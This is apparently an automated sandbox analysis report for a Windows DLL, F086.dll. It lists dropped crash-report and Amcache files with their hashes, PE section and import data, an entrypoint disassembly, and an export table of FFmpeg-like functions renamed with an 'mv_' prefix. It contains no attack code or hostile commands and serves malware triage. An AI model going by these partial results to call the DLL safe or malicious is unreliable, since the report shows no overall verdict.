C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C04.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4626
Entropy (8bit):	4.455304131650404
Encrypted:	false
SSDEEP:	48:cvIwSD8zs6KJgtWI9igmaWgc8sqYj48fm8M4JCdsE9FLo+q8/v8/+4SrStd:uITf6YFgmbgrsqYhJizoUzDWtd
MD5:	CF06537C17E748E62E8A797BADA1E31B
SHA1:	C9645DDFE40BFBAEC7D2856F917AE4A1A762643B
SHA-256:	CD7CDEB64F4FFCD2FA5B2854C3AA610BF6FDACE8AB76F6FFE74504B74503494F
SHA-512:	AD4E9F901D295FC56E2E566EC28293752B902748B35DA02C21A69D70DE68FAD37928C4066F7A2250F4DDD557814BC804302820B5C4BD28AC6F1AA32226EFA9BE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\national[1].htm

Download File

Process:	C:\Windows\SysWOW64\wermgr.exe
File Type:	HTML document, ASCII text, with very long lines (65212)
Category:	dropped
Size (bytes):	149507
Entropy (8bit):	5.28662942755702
Encrypted:	false
SSDEEP:	3072:2DbDv9PpwZW+V6ssCcVwjhrTFJnZV12KfgxmyLjsfqW:EcgvW
MD5:	8AE3F8E84A72A4D14E4D04A25143D7F8
SHA1:	564305FB38FCDFB369082CDB94D568B6CDAA58F5
SHA-256:	C09BE827203DCD4DA4509396F5E38BBA16343CE9B2E3EF1770E8240F38ED0073
SHA-512:	27AECBF22B846427E74C00240DD0E140CCBF8FF67D5DB258327EBE3F469AE0F9190227BF924028F4F3E4F3A594644BA53ECCAB81FE6E62E32CB8852353A727E4
Malicious:	false
Preview:	<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><script>if (typeof window !== "undefined" && typeof window.process === "undefined") {. window.process = window.process \|\| { env: {} };. }</script><script type="env-config">{"clientId":"xfinity-learn-ui","sitecoreApiKey":"{1A57AE5E-AF7C-4A9E-803A-C756E3F23267}","sitecoreApiUrl":"https://jss.xfinity.com/","dictionaryKey":"{5FA0A82E-BBDB-4FBD-A3F4-9C5D07AA6E0E}","uniform":false,"oAuth":{"clientId":"shoplearn-web","endpoint":"https://oauth.xfinity.com"},"endpoints":{"ssmEnv":"https://api.sc.xfinity.com","aiQApiUrl":"https://aiq-prod.codebig2.net","errorRedirectUrl":"https://www.xfinity.com/learn/landing/sorry","cspApiUrl":"https://csp-prod.codebig2.net","dataLayerTimelineApiUrl":"https://bdl43tfhab.execute-api.us-east-1.amazonaws.com/prod/aiq-banner"},"environment":{"name":"PROD"},"appName":"xfinity-lea

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.294307157015669
Encrypted:	false
SSDEEP:	12288:mj6m1blaBcIee5TMcQ2oipXZxuB0+W7qPX12YvORAzxumEjIbkfv2deQ:u6m1blaBcIf5TML41Yv4
MD5:	9698CF482BE494ABB013D242D5215BE3
SHA1:	1054537E7556960B3A9A642E1471152C47C4B1ED
SHA-256:	2D56F2E09B52D20DC0FB075C446D877176E1A6AB246122123FBC329521BB2793
SHA-512:	5C1600FBF4B2C7A9BA9F2B7B83D84D371B068E652BF6B64041E67598CA6569EE936EB6B4D2F76BB953A534805A1D61FCCF4B96CC0CEF2BC278D8C7D7C46470E0
Malicious:	false
Preview:	regf`...`...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmFi.)...................................................................................................................................................................................................................................................................................................................................................t........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	2.6778791974928686
Encrypted:	false
SSDEEP:	192:X7v11vqByEtVYV5FSETqW/b3rINn8h8l1ZV6nGoV/UeU7GXZFW0/UeUS:rv526rINn88lTVgGe/Up7mZRUpS
MD5:	6A2E46503BFF1E6F68DF3446316AF1CC
SHA1:	1F76AD9948DE2F74008C1BC84174ABE0A37C7776
SHA-256:	FA381A033F6111B2FE05784E413AC34B35BE8105866AD7E60CCBD2BB4FC00186
SHA-512:	A47F35B2D5ADB967E33EFA8E0A6EA34AFE063E04D3600475389B3FB31C99DC0F9B352FF638D42D2FBEBD2DD4688F20D7375240DDDC234950A3076CC85D9B2C3A
Malicious:	false
Preview:	regf_..._...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmFi.)...................................................................................................................................................................................................................................................................................................................................................tHvLE.>......_............N.....O.....A..........................hbin................p.\..,..........nk,...)........h........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...)........ ........................... .......Z.......................Root........lf......Root....nk ...).....................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck.......p...

Static File Info

General

File type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.737928842435983
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	F086.dll
File size:	965185
MD5:	931f3d361902807103b23fa74beb16a2
SHA1:	9ec1f75beaf217246fd8d97fa3d1e591300babb3
SHA256:	5f1a29b7907453a8785d9e6087a85c7bfab6b7fe3955bd645cb37ffdb20409c5
SHA512:	4c8322f125e7b51e0c6375dd1ec14e2c71bbb1972f68afd038013ebba763ba0e41a960fd782b9eb3d8b739f4ab26b129cf9ba3dca9b1a21739a495abb25aaacc
SSDEEP:	24576:D7AkdHt+UnNtqbVotX4Dw/9JGCZdBK/+NYouXFPn/yd4X:DZ8RDwlJGoY7XX
TLSH:	B5258EC0FBD744FAE46718B1B09AB7AFAB3112050138CE76DFA58E09E976B401DDB245
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....0d...........#...'.....................................................0 .....{.....@... .........................hC.

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x10001390
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6430AE80 [Sat Apr 8 00:00:00 2023 UTC]
TLS Callbacks:	0x10090cc0, 0x10090c70, 0x100a1c60
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ac404a1028e7ce450416867d9b3974cc

Entrypoint Preview

Instruction
sub esp, 0Ch
mov dword ptr [101D86FCh], 00000000h
mov ecx, dword ptr [esp+18h]
mov edx, dword ptr [esp+14h]
mov eax, dword ptr [esp+10h]
call 00007F6848D8C877h
add esp, 0Ch
retn 000Ch
lea esi, dword ptr [esi+00000000h]
lea esi, dword ptr [esi+00h]
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], 100C9000h
mov dword ptr [esp+04h], eax
call 00007F6848E2B80Eh
add esp, 1Ch
ret
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
sub esp, 18h
mov dword ptr [esp], 10001400h
call 00007F6848D8C9F3h
leave
ret
lea esi, dword ptr [esi+00000000h]
lea esi, dword ptr [esi+00h]
nop
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
push edi
push esi
push ebx
mov edx, dword ptr [esp+14h]
mov esi, dword ptr [esp+1Ch]
mov edi, dword ptr [esp+18h]
movzx ebx, dx
shr edx, 10h
test esi, esi
je 00007F6848D8CAA8h
nop
cmp esi, 04h
jbe 00007F6848D8CA62h
lea esi, dword ptr [esi+00000000h]
lea esi, dword ptr [esi+00h]
movzx eax, byte ptr [edi]
add edi, 04h
sub esi, 04h
movzx ebp, byte ptr [edi-03h]
movzx ecx, byte ptr [edi-02h]
add eax, ebx
movzx ebx, byte ptr [edi-01h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1da000	0x4368	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1df000	0x1388	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1e3000	0x378	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e4000	0x4128	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc61e4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1df328	0x2c4	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xab124	0xab200	False	0.4480831126734843	data	6.432110661692397	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xad000	0x100	0x200	False	0.28125	Matlab v4 mat-file (little endian) \377\377\377\377 , text, rows 4294967295, columns 4294967295, imaginary	2.102897197014083	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xae000	0x1a624	0x1a800	False	0.3911224941037736	data	5.329684115990636	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0xc9000	0x110264	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x1da000	0x4368	0x4400	False	0.4040670955882353	data	5.488698281853443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x1df000	0x1388	0x1400	False	0.3810546875	data	5.386273709762828	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x1e1000	0x30	0x200	False	0.060546875	data	0.25451054171027127	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x1e2000	0x8	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1e3000	0x1a64e	0x1b000	False	0.9544722945601852	data	7.904997942181886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1fe000	0x4128	0x4200	False	0.7178030303030303	data	6.590473987933104	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x1e3058	0x31c	data	English	United States

Imports

DLL	Import
bcrypt.dll	BCryptCloseAlgorithmProvider, BCryptGenRandom, BCryptOpenAlgorithmProvider
KERNEL32.dll	AcquireSRWLockExclusive, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileMappingA, CreateMutexA, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, FileTimeToSystemTime, FreeLibrary, GetConsoleMode, GetConsoleScreenBufferInfo, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetFullPathNameW, GetHandleInformation, GetLastError, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetProcessTimes, GetStdHandle, GetSystemDirectoryW, GetSystemTimeAdjustment, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetThreadTimes, GetTickCount64, GetTimeZoneInformation, InitOnceBeginInitialize, InitOnceComplete, InitializeConditionVariable, InitializeCriticalSection, InitializeSRWLock, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryA, LoadLibraryExA, LoadLibraryExW, MapViewOfFile, MultiByteToWideChar, OpenProcess, OutputDebugStringA, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReleaseMutex, ReleaseSRWLockExclusive, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, SetConsoleTextAttribute, SetEvent, SetLastError, SetProcessAffinityMask, SetSystemTime, SetThreadContext, SetThreadPriority, Sleep, SleepConditionVariableSRW, SuspendThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnmapViewOfFile, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteConsoleW
msvcrt.dll	__mb_cur_max, __setusermatherr, _aligned_free, _aligned_malloc, _aligned_realloc, _amsg_exit, _beginthreadex, _endthreadex, _errno, _fstat64, _get_osfhandle, _gmtime64, _hypot, _initterm, _iob, _localtime64, _lock, _mktime64, _setjmp3, _sopen, _ultoa, _unlock, _wsopen, abort, acos, asin, atan, atoi, bsearch, calloc, clock, cosh, exit, fprintf, fputc, fputs, free, fwrite, getc, getenv, islower, isspace, isupper, isxdigit, localeconv, log10, malloc, memchr, memcmp, memcpy, memmove, memset, printf, rand, realloc, setlocale, sinh, strchr, strcmp, strcpy, strcspn, strerror, strftime, strlen, strncmp, strrchr, strspn, strstr, strtol, strtoul, tan, tanh, tolower, ungetc, vfprintf, wcscat, wcscpy, wcslen, wcsrchr, longjmp, _strdup, _read, _isatty, _fdopen, _close
USER32.dll	GetDesktopWindow

Exports

Name	Ordinal	Address
mv_add_i	1	0x10023c30
mv_add_q	2	0x10035990
mv_add_stable	3	0x10027e10
mv_adler32_update	4	0x10001410
mv_aes_alloc	5	0x10001bd0
mv_aes_crypt	6	0x10001bf0
mv_aes_ctr_alloc	7	0x100022f0
mv_aes_ctr_crypt	8	0x10002480
mv_aes_ctr_free	9	0x10002420
mv_aes_ctr_get_iv	10	0x10002370
mv_aes_ctr_increment_iv	11	0x10002430
mv_aes_ctr_init	12	0x100023c0
mv_aes_ctr_set_full_iv	13	0x10002340
mv_aes_ctr_set_iv	14	0x10002310
mv_aes_ctr_set_random_iv	15	0x10002380
mv_aes_init	16	0x10001c10
mv_aes_size	17	0x100ae00c
mv_append_path_component	18	0x10006eb0
mv_asprintf	19	0x10006850
mv_assert0_fpu	20	0x1008cfa0
mv_audio_fifo_alloc	21	0x10002670
mv_audio_fifo_drain	22	0x10002af0
mv_audio_fifo_free	23	0x10002610
mv_audio_fifo_peek	24	0x10002900
mv_audio_fifo_peek_at	25	0x10002990
mv_audio_fifo_read	26	0x10002a40
mv_audio_fifo_realloc	27	0x100027b0
mv_audio_fifo_reset	28	0x10002b70
mv_audio_fifo_size	29	0x10002bb0
mv_audio_fifo_space	30	0x10002bc0
mv_audio_fifo_write	31	0x10002850
mv_base64_decode	32	0x100076c0
mv_base64_encode	33	0x100078d0
mv_basename	34	0x10006d70
mv_blowfish_alloc	35	0x10007da0
mv_blowfish_crypt	36	0x100084b0
mv_blowfish_crypt_ecb	37	0x10007dc0
mv_blowfish_init	38	0x100a6ac0
mv_bmg_get	39	0x10024fe0
mv_bprint_append_data	40	0x10008f30
mv_bprint_channel_layout	41	0x1000c9f0
mv_bprint_chars	42	0x10008d20
mv_bprint_clear	43	0x10009670
mv_bprint_escape	44	0x10009730
mv_bprint_finalize	45	0x10009690
mv_bprint_get_buffer	46	0x10009500
mv_bprint_init	47	0x10008880
mv_bprint_init_for_buffer	48	0x100089a0
mv_bprint_strftime	49	0x10009130
mv_bprintf	50	0x100089c0
mv_buffer_alloc	51	0x10009dc0
mv_buffer_allocz	52	0x10009ef0
mv_buffer_create	53	0x10009e60
mv_buffer_default_free	54	0x10009d10
mv_buffer_get_opaque	55	0x1000a090
mv_buffer_get_ref_count	56	0x1000a0a0
mv_buffer_is_writable	57	0x1000a070
mv_buffer_make_writable	58	0x1000a0b0
mv_buffer_pool_buffer_get_opaque	59	0x1000a9b0
mv_buffer_pool_get	60	0x1000a720
mv_buffer_pool_init	61	0x1000a5f0
mv_buffer_pool_init2	62	0x1000a590
mv_buffer_pool_uninit	63	0x1000a650
mv_buffer_realloc	64	0x1000a1d0
mv_buffer_ref	65	0x10009fc0
mv_buffer_replace	66	0x1000a480
mv_buffer_unref	67	0x1000a000
mv_calloc	68	0x100291f0
mv_camellia_alloc	69	0x1000b0b0
mv_camellia_crypt	70	0x1000b0d0
mv_camellia_init	71	0x100a6c8e
mv_camellia_size	72	0x100af650
mv_cast5_alloc	73	0x1000c090
mv_cast5_crypt	74	0x1000c1b0
mv_cast5_crypt2	75	0x1000c0b0
mv_cast5_init	76	0x100a7a6e
mv_cast5_size	77	0x100b1a60
mv_channel_description	78	0x1000c470
mv_channel_description_bprint	79	0x1000c3c0
mv_channel_from_string	80	0x1000c560
mv_channel_layout_channel_from_index	81	0x1000dc10
mv_channel_layout_channel_from_string	82	0x1000eac0
mv_channel_layout_check	83	0x1000ec10
mv_channel_layout_compare	84	0x1000edb0
mv_channel_layout_copy	85	0x1000d340
mv_channel_layout_default	86	0x1000eff0
mv_channel_layout_describe	87	0x1000dba0
mv_channel_layout_describe_bprint	88	0x1000d4d0
mv_channel_layout_extract_channel	89	0x1000d060
mv_channel_layout_from_mask	90	0x1000d1b0
mv_channel_layout_from_string	91	0x1000dd40
mv_channel_layout_index_from_channel	92	0x1000e760
mv_channel_layout_index_from_string	93	0x1000e950
mv_channel_layout_standard	94	0x1000f050
mv_channel_layout_subset	95	0x1000f080
mv_channel_layout_uninit	96	0x1000d270
mv_channel_name	97	0x1000c2d0
mv_channel_name_bprint	98	0x1000c220
mv_chroma_location_enum_to_pos	99	0x10034f30
mv_chroma_location_from_name	100	0x10034ee0
mv_chroma_location_name	101	0x10034ec0
mv_chroma_location_pos_to_enum	102	0x10034f70
mv_cmp_i	103	0x10024200
mv_color_primaries_from_name	104	0x10034d90
mv_color_primaries_name	105	0x10034d70
mv_color_range_from_name	106	0x10034d20
mv_color_range_name	107	0x10034d00
mv_color_space_from_name	108	0x10034e70
mv_color_space_name	109	0x10034e50
mv_color_transfer_from_name	110	0x10034e00
mv_color_transfer_name	111	0x10034de0
mv_compare_mod	112	0x100279f0
mv_compare_ts	113	0x10027830
mv_content_light_metadata_alloc	114	0x10027020
mv_content_light_metadata_create_side_data	115	0x10027050
mv_cpu_count	116	0x1000f8f0
mv_cpu_force_count	117	0x1000f9e0
mv_cpu_max_align	118	0x1000f9f0
mv_crc	119	0x100101d0
mv_crc_get_table	120	0x1000fdb0
mv_crc_init	121	0x1000fbc0
mv_csp_luma_coeffs_from_avcsp	122	0x100102b0
mv_csp_primaries_desc_from_id	123	0x100102f0
mv_csp_primaries_id_from_desc	124	0x10010320
mv_d2q	125	0x10035aa0
mv_d2str	126	0x100068e0
mv_default_get_category	127	0x10026240
mv_default_item_name	128	0x10026230
mv_des_alloc	129	0x10010d80
mv_des_crypt	130	0x10010e40
mv_des_init	131	0x10010da0
mv_des_mac	132	0x10010e90
mv_detection_bbox_alloc	133	0x10010ee0
mv_detection_bbox_create_side_data	134	0x10010f70
mv_dict_copy	135	0x10011d20
mv_dict_count	136	0x10011070
mv_dict_free	137	0x10011cc0
mv_dict_get	138	0x100110d0
mv_dict_get_string	139	0x100121a0
mv_dict_iterate	140	0x10011090
mv_dict_parse_string	141	0x100118c0
mv_dict_set	142	0x10011210
mv_dict_set_int	143	0x10011560
mv_dirname	144	0x10006e10
mv_display_matrix_flip	145	0x100126f0
mv_display_rotation_get	146	0x10012470
mv_display_rotation_set	147	0x100125c0
mv_div_i	148	0x10024ef0
mv_div_q	149	0x10035920
mv_dovi_alloc	150	0x10012780
mv_dovi_metadata_alloc	151	0x100127b0
mv_downmix_info_update_side_data	152	0x10012800
mv_dynamic_hdr_plus_alloc	153	0x1001d0a0
mv_dynamic_hdr_plus_create_side_data	154	0x1001d0d0
mv_dynamic_hdr_vivid_alloc	155	0x1001d130
mv_dynamic_hdr_vivid_create_side_data	156	0x1001d160
mv_dynarray2_add	157	0x100296f0
mv_dynarray_add	158	0x10029620
mv_dynarray_add_nofree	159	0x10029560
mv_encryption_info_add_side_data	160	0x10012f30
mv_encryption_info_alloc	161	0x10012a70
mv_encryption_info_clone	162	0x10012b40
mv_encryption_info_free	163	0x10012cf0
mv_encryption_info_get_side_data	164	0x10012d40
mv_encryption_init_info_add_side_data	165	0x10013860
mv_encryption_init_info_alloc	166	0x10013100
mv_encryption_init_info_free	167	0x100132d0
mv_encryption_init_info_get_side_data	168	0x10013480
mv_escape	169	0x10007050
mv_expr_count_func	170	0x100176e0
mv_expr_count_vars	171	0x10017650
mv_expr_eval	172	0x100177a0
mv_expr_free	173	0x10015280
mv_expr_parse	174	0x10017110
mv_expr_parse_and_eval	175	0x100177f0
mv_fast_malloc	176	0x10029d10
mv_fast_mallocz	177	0x10029df0
mv_fast_realloc	178	0x10029c60
mv_fifo_alloc	179	0x10018a20
mv_fifo_alloc2	180	0x10017e40
mv_fifo_alloc_array	181	0x10018990
mv_fifo_auto_grow_limit	182	0x10017ef0
mv_fifo_can_read	183	0x10017f10
mv_fifo_can_write	184	0x10017f40
mv_fifo_drain	185	0x100192b0
mv_fifo_drain2	186	0x100188c0
mv_fifo_elem_size	187	0x10017f00
mv_fifo_free	188	0x10018aa0
mv_fifo_freep	189	0x10018ae0
mv_fifo_freep2	190	0x10018950
mv_fifo_generic_peek	191	0x10019120
mv_fifo_generic_peek_at	192	0x10018fc0
mv_fifo_generic_read	193	0x10019160
mv_fifo_generic_write	194	0x10018e70
mv_fifo_grow	195	0x10018ce0
mv_fifo_grow2	196	0x10017f70
mv_fifo_peek	197	0x10018760
mv_fifo_peek_to_cb	198	0x100188a0
mv_fifo_read	199	0x10018500
mv_fifo_read_to_cb	200	0x100186c0
mv_fifo_realloc2	201	0x10018b70
mv_fifo_reset	202	0x10018b20
mv_fifo_reset2	203	0x10018930
mv_fifo_size	204	0x10018b40
mv_fifo_space	205	0x10018b50
mv_fifo_write	206	0x100180f0
mv_fifo_write_from_cb	207	0x100182a0
mv_file_map	208	0x100192e0
mv_file_unmap	209	0x10019570
mv_film_grain_params_alloc	210	0x10019b60
mv_film_grain_params_create_side_data	211	0x10019b90
mv_find_best_pix_fmt_of_2	212	0x10034a40
mv_find_info_tag	213	0x10032410
mv_find_nearest_q_idx	214	0x10035e60
mv_fopen_utf8	215	0x10019b50
mv_force_cpu_flags	216	0x1000f820
mv_fourcc_make_string	217	0x1008ced0
mv_frame_alloc	218	0x1001ac40
mv_frame_apply_cropping	219	0x1001c490
mv_frame_clone	220	0x1001c050
mv_frame_copy	221	0x1001b8d0
mv_frame_copy_props	222	0x1001b550
mv_frame_free	223	0x1001adb0
mv_frame_get_buffer	224	0x1001adf0
mv_frame_get_plane_buffer	225	0x1001b570
mv_frame_get_side_data	226	0x1001b890
mv_frame_is_writable	227	0x1001b4b0
mv_frame_make_writable	228	0x1001c210
mv_frame_move_ref	229	0x1001b320
mv_frame_new_side_data	230	0x1001b7e0
mv_frame_new_side_data_from_buf	231	0x1001b750
mv_frame_ref	232	0x1001bc40
mv_frame_remove_side_data	233	0x1001c3e0
mv_frame_side_data_name	234	0x1001c470
mv_frame_unref	235	0x1001b300
mv_free	236	0x100290d0
mv_freep	237	0x100290e0
mv_gcd	238	0x10027090
mv_gcd_q	239	0x100362f0
mv_get_alt_sample_fmt	240	0x1003c9f0
mv_get_bits_per_pixel	241	0x100345a0
mv_get_bytes_per_sample	242	0x1003cb50
mv_get_channel_description	243	0x1000cf80
mv_get_channel_layout	244	0x1000c640
mv_get_channel_layout_channel_index	245	0x1000cd50
mv_get_channel_layout_nb_channels	246	0x1000cc80
mv_get_channel_layout_string	247	0x1000cbf0
mv_get_channel_name	248	0x1000cea0
mv_get_colorspace_name	249	0x1001ac20
mv_get_cpu_flags	250	0x1000f880
mv_get_default_channel_layout	251	0x1000cd10
mv_get_extended_channel_layout	252	0x1000c8f0
mv_get_known_color_name	253	0x10031760
mv_get_media_type_string	254	0x1008cd60
mv_get_packed_sample_fmt	255	0x1003ca30
mv_get_padded_bits_per_pixel	256	0x100345f0
mv_get_picture_type_char	257	0x1008cd80
mv_get_pix_fmt	258	0x10034480
mv_get_pix_fmt_loss	259	0x10034a10
mv_get_pix_fmt_name	260	0x10034450
mv_get_pix_fmt_string	261	0x100346a0
mv_get_planar_sample_fmt	262	0x1003ca70
mv_get_random_seed	263	0x10035030
mv_get_sample_fmt	264	0x1003c860
mv_get_sample_fmt_name	265	0x1003c840
mv_get_sample_fmt_string	266	0x1003caa0
mv_get_standard_channel_layout	267	0x1000d150
mv_get_time_base_q	268	0x1008cf90
mv_get_token	269	0x10006940
mv_gettime	270	0x1004dbb0
mv_gettime_relative	271	0x1004dbf0
mv_gettime_relative_is_monotonic	272	0x1004dc60
mv_hash_alloc	273	0x1001c790
mv_hash_final	274	0x1001cb30
mv_hash_final_b64	275	0x1001ce80
mv_hash_final_bin	276	0x1001cbc0
mv_hash_final_hex	277	0x1001ce00
mv_hash_freep	278	0x1001d070
mv_hash_get_name	279	0x1001c770
mv_hash_get_size	280	0x1001c780
mv_hash_init	281	0x1001c870
mv_hash_names	282	0x1001c750
mv_hash_update	283	0x1001ca10
mv_hmac_alloc	284	0x1001d220
mv_hmac_calc	285	0x1001d720
mv_hmac_final	286	0x1001d5a0
mv_hmac_free	287	0x1001d3a0
mv_hmac_init	288	0x1001d3e0
mv_hmac_update	289	0x1001d590
mv_hwdevice_ctx_alloc	290	0x1001d9d0
mv_hwdevice_ctx_create	291	0x1001e0b0
mv_hwdevice_ctx_create_derived	292	0x1001e320
mv_hwdevice_ctx_create_derived_opts	293	0x1001e190
mv_hwdevice_ctx_init	294	0x1001db30
mv_hwdevice_find_type_by_name	295	0x1001d920
mv_hwdevice_get_hwframe_constraints	296	0x1001dfd0
mv_hwdevice_get_type_name	297	0x1001d970
mv_hwdevice_hwconfig_alloc	298	0x1001dfa0
mv_hwdevice_iterate_types	299	0x1001d990
mv_hwframe_constraints_free	300	0x1001e070
mv_hwframe_ctx_alloc	301	0x1008d450
mv_hwframe_ctx_create_derived	302	0x1001ea30
mv_hwframe_ctx_init	303	0x1001e7f0
mv_hwframe_get_buffer	304	0x1001e690
mv_hwframe_map	305	0x1001e450
mv_hwframe_transfer_data	306	0x1001dd70
mv_hwframe_transfer_get_formats	307	0x1001dd40
mv_i2int	308	0x10024fb0
mv_image_alloc	309	0x10021d20
mv_image_check_sar	310	0x100222b0
mv_image_check_size	311	0x100221c0
mv_image_check_size2	312	0x10022070
mv_image_copy	313	0x10022610
mv_image_copy_plane	314	0x100224f0
mv_image_copy_plane_uc_from	315	0x10022390
mv_image_copy_to_buffer	316	0x10023350
mv_image_copy_uc_from	317	0x10022af0
mv_image_fill_arrays	318	0x10022fe0
mv_image_fill_black	319	0x10023620
mv_image_fill_linesizes	320	0x100215d0
mv_image_fill_max_pixsteps	321	0x10021380
mv_image_fill_plane_sizes	322	0x100219b0
mv_image_fill_pointers	323	0x10021af0
mv_image_get_buffer_size	324	0x10023180
mv_image_get_linesize	325	0x10021480
mv_int2i	326	0x10024f80
mv_int_list_length_for_size	327	0x1008cda0
mv_lfg_init	328	0x100a7ee0
mv_lfg_init_from_data	329	0x10025100
mv_log	330	0x10026560
mv_log2	331	0x10024fc0
